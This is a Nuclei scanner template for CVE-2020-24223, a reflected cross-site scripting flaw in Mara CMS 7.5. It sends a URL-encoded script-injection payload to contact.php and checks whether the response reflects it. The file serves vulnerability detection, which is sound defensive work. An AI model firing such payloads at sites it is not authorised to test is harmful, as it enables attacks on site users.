nuclei-templates/cves/2020/CVE-2020-24223.yaml

35 lines
1.0 KiB
YAML

id: CVE-2020-24223
info:
name: Mara CMS 7.5 - Reflective Cross-Site Scripting
author: pikpikcu
severity: medium
description: Mara CMS 7.5 allows cross-site scripting (XSS) in contact.php via the theme or pagetheme parameters.
reference:
- https://www.exploit-db.com/exploits/48777
- https://sourceforge.net/projects/maracms/ # vendor homepage
- https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link
tags: cve,cve2020,mara,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-24223
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"><script>alert(document.domain)</script>'
part: body
- type: word
words:
- "text/html"
part: header